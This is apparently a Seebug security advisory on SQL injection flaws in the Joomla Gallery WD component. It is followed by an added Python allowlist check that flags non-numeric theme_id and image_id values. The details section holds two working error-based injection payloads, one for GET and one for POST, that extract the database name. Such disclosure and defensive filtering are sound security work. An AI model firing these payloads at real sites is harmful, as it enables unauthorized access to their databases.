Joomla Component Gallery WD SQL Injection Vulnerability

2016-01-13T00:00:00
ID SSV:90383
Type seebug
Reporter kikay
Modified 2016-01-13T00:00:00

Description

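0x01 Vulnerability Overview

The Joomla component Gallery WD contains multiple SQL injection vulnerabilities. A remote attacker can exploit them to execute arbitrary SQL statements. The extension can be downloaded from: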

http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd

0x02 Vulnerability Details

2.1 GET-based SQL injection in the theme_id parameter

The PoC for this vulnerability has the following format:

index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) #

2.2 POST-based SQL injection in the image_id parameter

The vulnerable URL is:

/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2

The submitted POST request is as follows:

image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search #

0x03 Remediation

Filtering the input is sufficient.
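
One way to apply this filtering, shown as an added example that is not the component's own code and not part of the original advisory: a Python check that flags requests to com_gallery_wd whose theme_id or image_id is not a plain integer. The function name, the assumption that both parameters are numeric IDs, and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory reports as injectable.
# Assumption: both are numeric IDs, as in the advisory's benign values (19, 1).
ID_PARAMS = ("theme_id", "image_id")
STRICT_INT = re.compile(r"[0-9]{1,10}")


def non_numeric_ids(url, post_body=""):
    """Return {param: value} for ID parameters that are not plain integers.

    Only requests addressed to option=com_gallery_wd are inspected.
    Both the query string (GET) and the form body (POST) are checked.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_gallery_wd" not in query.get("option", []):
        return {}
    form = parse_qs(post_body, keep_blank_values=True)
    bad = {}
    for name in ID_PARAMS:
        for value in query.get(name, []) + form.get(name, []):
            if not STRICT_INT.fullmatch(value):
                bad[name] = value
    return bad


# Constructed sample requests (not captured traffic): (URL, POST body).
BASE = "/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2"
SAMPLES = [
    (BASE + "&theme_id=1", ""),
    (BASE + "&theme_id=1%20AND%20(SELECT%201)", ""),
    (BASE, "image_id=19+AND+(SELECT+1)&rate=&ajax_task=save_hit_count"
           "&task=gallerybox.ajax_search"),
    ("/index.php?option=com_content&view=article&id=5", "image_id=abc"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url[-40:], "->", non_numeric_ids(url, body) or "ok")
```

The same allowlist logic can reject the request before it reaches the query, or run over web server logs to find requests that carried non-numeric IDs.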